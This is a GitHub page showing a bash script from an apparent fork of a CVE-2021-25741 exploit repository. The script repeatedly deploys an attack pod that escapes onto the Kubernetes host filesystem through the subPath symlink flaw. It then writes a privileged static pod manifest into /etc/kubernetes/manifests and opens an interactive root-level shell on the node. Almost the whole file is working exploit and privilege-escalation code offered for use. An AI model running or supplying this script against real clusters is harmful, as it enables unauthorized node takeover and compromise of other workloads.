forked from Betep0k/CVE-2021-25741
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathIWAS
executable file
·32 lines (31 loc) · 1.06 KB
/
IWAS
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
#!/usr/bin/env bash
while [ 1 -lt 2 ]
do
printf "\033[2m"
kubectl apply -f attack.yaml;
kubectl wait --for=condition=Running pod/hostpath4everyone --timeout=40s
for c in {1..10}; do
listing=$(kubectl logs hostpath4everyone mount-container$c);
if [ "$listing" = "" ];
then
echo -n "$c❌"
else
echo -n " $c🧨"
# echo "run 'kubectl exec -i -t hostpath4everyone -c mount-container$c -- /bin/bash' and then 'ls /mnt/data$c"
printf "Post-exploitation: Create static privileged pods\n"
kubectl cp ./privesc.yaml hostpath4everyone:/mnt/data$c/etc/kubernetes/manifests/ -c mount-container$c
kubectl -n kube-public wait --for=condition=Ready pod -l app=privesc
POD_NAME=$(kubectl get pod -l app=privesc -n kube-public -o name | head -n 1)
printf "\033[0m"
printf "Enjoy your shell ! 🪄\n"
kubectl -n kube-public exec -it $POD_NAME -- bash
kubectl delete pod hostpath4everyone
exit
fi
done
printf "\033[0m"
echo -e "\nBad attempts. Delete pod and retry.."
printf "\033[2m"
kubectl delete pod hostpath4everyone
printf "\033[0m"
done